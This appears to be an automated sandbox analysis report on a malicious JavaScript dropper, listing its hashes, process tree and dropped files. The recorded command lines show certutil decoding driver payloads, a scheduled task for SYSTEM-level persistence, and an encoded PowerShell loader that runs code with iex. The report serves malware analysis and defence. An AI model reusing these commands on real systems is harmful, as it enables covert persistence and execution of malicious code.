File name: | 50dc928b873485cc8c198106ed99af1f42224791c2fea86436c1bc5ea558112f_bav01.js |
Full analysis: | https://app.any.run/tasks/e2f9d358-8b69-4b95-ab7d-b2e6e56e0509 |
Verdict: | Malicious activity |
Analysis date: | July 11, 2019, 15:52:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 45F19E09D830BA6430591D95C1669E74 |
SHA1: | F8D0D6C771AB955A1E6D87C258BF8CE316283E3B |
SHA256: | 50DC928B873485CC8C198106ED99AF1F42224791C2FEA86436C1BC5EA558112F |
SSDEEP: | 6144:B8WglNO91dDtKicfluSPNpSrJo4jNILX+:tgjOdDtryPSrJPjAX+ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3336 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\50dc928b873485cc8c198106ed99af1f42224791c2fea86436c1bc5ea558112f_bav01.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
576 | "C:\Windows\System32\certutil.exe" -decode "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.b64" "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.dll" | C:\Windows\System32\certutil.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2208 | "C:\Windows\System32\certutil.exe" -decode "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.b64" "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.sys" | C:\Windows\System32\certutil.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3168 | "C:\Windows\System32\certutil.exe" -decode "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.b64" "C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.sys" | C:\Windows\System32\certutil.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2664 | "C:\Windows\System32\schtasks.exe" /create /SC onstart /RU SYSTEM /RL HIGHEST /TN khdgjufkskfhgjdsfk /TR "C:\Windows\system32\wscript.exe C:\Users\admin\AppData\Local\Temp\50dc928b873485cc8c198106ed99af1f42224791c2fea86436c1bc5ea558112f_bav01.js" | C:\Windows\System32\schtasks.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2652 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABkAGYAZwBoAGoAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgB2ADoAbgB0AHQAeQB1AHUAeQB0ACkAKQA7ACQAZQBuAHYAOgBuAHQAdAB5AHUAdQB5AHQAPQAiACIAOwBpAGUAeAAgACQAZABmAGcAaABqAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3336 | WScript.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.b64 | — | |
MD5:— | SHA256:— | |||
3336 | WScript.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.b64 | — | |
MD5:— | SHA256:— | |||
2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NBUAINJQ0CDWM3NPIEDW.temp | — | |
MD5:— | SHA256:— | |||
2208 | certutil.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert32.sys | executable | |
MD5:492CB6C0C74695D901C05DFFF160FE3C | SHA256:7C6FDE6D6DB2EF24BDDD49D29EAA0EC7373B30D81A81BEFE5CE806890AE749A3 | |||
3336 | WScript.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.b64 | text | |
MD5:0A9B3DE9A052F6BBF9B5E205CED145DF | SHA256:446BE2A520F1B553FB1F5309DC01C9D14C8883B5698640316204FC4C8BF41824 | |||
576 | certutil.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert.dll | executable | |
MD5:AA491FE40F8A9A70CF5D5F82E1679DBE | SHA256:2FF921B4F4905616589737004760C4FD2720A890FD370715AFBCE535D4DFF992 | |||
2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF166eeb.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
2652 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
3168 | certutil.exe | C:\Users\admin\AppData\Local\Temp\SystemConfigInfo000\WinDivert64.sys | executable | |
MD5:66FD4B7D80101B8087CE67BB7C130594 | SHA256:016D22F9D64E7B22C9040298373C5F213103DB0744003184D51B81FD4985D877 |